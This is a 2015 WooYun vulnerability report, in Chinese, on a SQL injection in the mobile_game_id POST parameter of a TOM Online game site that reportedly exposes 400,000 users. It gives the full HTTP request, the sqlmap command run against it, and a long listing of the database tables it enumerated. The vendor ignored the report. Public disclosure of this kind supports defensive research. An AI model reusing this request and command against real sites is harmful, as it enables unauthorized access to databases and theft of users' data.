当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118977

漏洞标题:Tom在线某站SQL注射涉及40w用户

相关厂商:TOM在线

漏洞作者: 路人甲

提交时间:2015-06-09 10:29

修复时间:2015-06-14 10:30

公开时间:2015-06-14 10:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-09: 细节已通知厂商并且等待厂商处理中
2015-06-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

tom自己说的40万啊

详细说明:

1.png


POST /web/download_page.jsp?source=HP_mobilegame_bybsb&from=00403&class=and&q_id=99 HTTP/1.1
Host: pk.tom.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=abc1jamRVmxlb9eZvF82u
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
mobile_game_id=12777


sqlmap.py -r test.txt -p mobile_game_id --dbms mysql
post注入

Database: newwapdb
[228 tables]
+---------------------------------------+
| back_download_game_info               |
| bind_tom_139                          |
| download_count                        |
| filter_words                          |
| game_bulletin                         |
| game_clientinfo                       |
| game_cogameinfo                       |
| game_coinfo                           |
| game_goods                            |
| game_goods_type                       |
| game_mission                          |
| game_netbattle                        |
| game_netbattle_item                   |
| game_photo                            |
| game_single_record                    |
| game_stat_day                         |
| game_toolsinfo                        |
| game_uids                             |
| game_user                             |
| game_user_black                       |
| game_user_chat                        |
| game_user_friend                      |
| game_user_level                       |
| game_user_sign                        |
| game_user_sns                         |
| game_user_task                        |
| game_user_visitor                     |
| game_useraddressinfo                  |
| game_usergold                         |
| game_usergolddetail                   |
| game_usergoods                        |
| game_userinfo                         |
| game_usermdoupmsg                     |
| game_userpay_offerclient              |
| game_userpayrecord                    |
| game_userprize                        |
| game_userrandom                       |
| game_userrandom_bak                   |
| game_userrandom_new                   |
| game_userrechargerecord               |
| game_v2_netbattle                     |
| game_v2_netbattle_finalgoldinfo       |
| game_v3_bulletin                      |
| game_v3_friends                       |
| game_v3_linkmobile                    |
| game_v3_netbattle                     |
| game_v3_netbattle_finalgoldinfo       |
| game_v3_netbattle_item                |
| game_v3_pksparameter                  |
| game_v3_prizes                        |
| game_v3_sendsmsinfo                   |
| game_v3_single_record                 |
| game_v3_usergold                      |
| game_v3_usergolddetail                |
| game_v3_userinfo                      |
| game_v3_userprize                     |
| game_v4_adv_record                    |
| game_v4_bulletin                      |
| game_v4_bulletin_wap                  |
| game_v4_cmddisc_history               |
| game_v4_coupon_history                |
| game_v4_couponprize_info              |
| game_v4_fgrechargeprize_history       |
| game_v4_finalgold_rechargeinfo        |
| game_v4_friends                       |
| game_v4_gamedown_config               |
| game_v4_gametype_info                 |
| game_v4_linkmobile                    |
| game_v4_lucklydraw_history            |
| game_v4_manualprize                   |
| game_v4_manualprize_info              |
| game_v4_message                       |
| game_v4_message_bak20120420           |
| game_v4_message_bak20120501           |
| game_v4_message_bak20120604           |
| game_v4_message_location              |
| game_v4_message_location_bak20120420  |
| game_v4_message_location_bak20120501  |
| game_v4_message_location_bak20120604  |
| game_v4_message_location_new          |
| game_v4_message_new                   |
| game_v4_mobileuid_linkinfo            |
| game_v4_msgpush_info                  |
| game_v4_msgpush_type                  |
| game_v4_netbattle                     |
| game_v4_netbattle_bak20120420         |
| game_v4_netbattle_finalgoldinfo       |
| game_v4_netbattle_item                |
| game_v4_netbattle_item_bak20120420    |
| game_v4_onlinegame_info               |
| game_v4_onlinegame_itempayment        |
| game_v4_onlinegame_smscode            |
| game_v4_payment_platform_detail       |
| game_v4_pksparameter                  |
| game_v4_prizes                        |
| game_v4_robot_sendsmscount            |
| game_v4_robotinfo                     |
| game_v4_sendsmsinfo                   |
| game_v4_single_record                 |
| game_v4_thirdpart_cardinfo            |
| game_v4_thirdpart_partnerinfo         |
| game_v4_thirdpart_usercard            |
| game_v4_topboard                      |
| game_v4_user_freegold                 |
| game_v4_user_freegold_monthly         |
| game_v4_user_freegolddetail           |
| game_v4_user_prizeinfo                |
| game_v4_userbattle_summarizinfo       |
| game_v4_usercoupon_info               |
| game_v4_usergold                      |
| game_v4_usergolddetail                |
| game_v4_userinfo                      |
| game_v4_userinfo_extend               |
| game_v4_userlogin                     |


该有的表都有了

漏洞证明:

QQ图片20150606153011.png


QQ图片20150605161728.png


QQ图片20150608090704.png


QQ图片20150608090759.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-14 10:30

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无